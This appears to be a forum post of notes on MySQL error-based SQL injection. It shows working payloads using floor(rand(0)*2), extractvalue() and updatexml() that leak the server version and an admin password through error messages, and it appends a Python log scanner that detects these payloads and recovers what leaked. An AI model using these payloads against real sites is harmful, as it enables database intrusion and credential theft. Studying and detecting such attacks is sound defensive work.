Posting some of my old notes. When MySQL fails to execute a statement it returns an error message, and PHP+MySQL sites often print that error text straight onto the page. Where that happens, the three methods below can be used to pull specific data out through a deliberately triggered error.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

The following statements can be used (the first one is shown in the form used in the worked example below, with the subquery parenthesised):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As shown, the MySQL version string is leaked inside the duplicate-entry error (the trailing 1 is the floor(rand(0)*2) value that is appended to it). To retrieve other data, replace the version() expression with the subquery of interest. For example, to read the administrator user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run (0x5c is a backslash, which makes the XPath expression invalid and gets it echoed back in the error):

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test run (0x5e24 is the delimiter string ^$, which marks where the leaked value starts and ends in the error):

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
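An added detection example, not part of the original post: a small Python scanner that runs over constructed MySQL query/error log lines and flags the three patterns above (the floor(rand(0)*2) GROUP BY duplicate-key trick, extractvalue(), updatexml()) plus the two server errors they produce (ERROR 1062 on 'group_key' and ERROR 1105 XPATH syntax error). It also recovers the value the error echoed back, which is what an incident responder needs to know was exposed. The log line format and every sample line are made up for this example; only the error messages and statements mirror the ones shown in the post.

```python
"""Flag error-based SQL injection in MySQL logs and recover what leaked.

Added example; the log format below is constructed for illustration and is
not a real MySQL log layout.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample lines (benign traffic mixed with the three injected
# statements from the post and the errors they raise). Not real data.
SAMPLE_LOG: List[str] = [
    "2024-01-01T10:00:01 Query select * from article where id = 1",
    "2024-01-01T10:00:02 Query select * from article where id = 1 and (select 1 from "
    "(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "2024-01-01T10:00:02 Error ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "2024-01-01T10:00:03 Query select * from article where id = 2",
    "2024-01-01T10:00:04 Query select * from article where id = 1 and extractvalue(1, concat(0x5c,"
    "(select pass from admin limit 1)))",
    "2024-01-01T10:00:04 Error ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "2024-01-01T10:00:05 Query select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,"
    "(select pass from admin limit 1),0x5e24),1))",
    "2024-01-01T10:00:05 Error ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
    "2024-01-01T10:00:06 Query select count(*) from article group by title",
]

# Signatures for the injected statements themselves.
QUERY_SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    # count(*) + concat(..., floor(rand(0)*2)) + group by: forces the
    # duplicate 'group_key' error that carries the concatenated value
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Signatures for the server errors those statements produce; the named
# group captures the text the server echoed back.
ERROR_SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "duplicate_group_key": re.compile(
        r"ERROR 1062 \(23000\): Duplicate entry '(?P<val>.*)' for key 'group_key'"),
    "xpath_syntax_error": re.compile(
        r"ERROR 1105 \(HY000\): XPATH syntax error: '(?P<val>.*)'"),
}


def classify(line: str) -> List[str]:
    """Return the names of every signature that matches the line."""
    tags = [name for name, rx in QUERY_SIGNATURES.items() if rx.search(line)]
    tags += [name for name, rx in ERROR_SIGNATURES.items() if rx.search(line)]
    return tags


def leaked_value(line: str) -> Optional[str]:
    """Recover the data echoed inside an injection-induced error, or None."""
    for name, rx in ERROR_SIGNATURES.items():
        m = rx.search(line)
        if not m:
            continue
        val = m.group("val")
        if name == "duplicate_group_key":
            # floor(rand(0)*2) appends a single 0/1 digit to the leaked string
            return val[:-1] if val and val[-1] in "01" else val
        # Strip the attacker-chosen delimiters seen in the post:
        # 0x5c -> '\' and 0x5e24 -> '^$'
        return val.strip("\\^$")
    return None


def scan(lines: List[str]) -> List[Tuple[int, List[str], Optional[str]]]:
    """Scan log lines; return (1-based line number, tags, leaked value) per hit."""
    findings = []
    for idx, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            findings.append((idx, tags, leaked_value(line)))
    return findings


if __name__ == "__main__":
    for lineno, tags, leak in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(tags)}" + (f"  leaked={leak!r}" if leak else ""))
```

Matching on the error text is the higher-value half of this: a single query-log signature can be evaded by rewriting the statement, but the application cannot leak data through this channel without the server producing one of these two error messages, so an alert on ERROR 1062 'group_key' or ERROR 1105 XPATH errors coming from a web-facing database account is a reliable indicator regardless of payload shape. Turning off error display in the PHP front end removes the channel entirely; the detection above is the complementary monitoring control.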
That's all. Thanks to the foreign guys.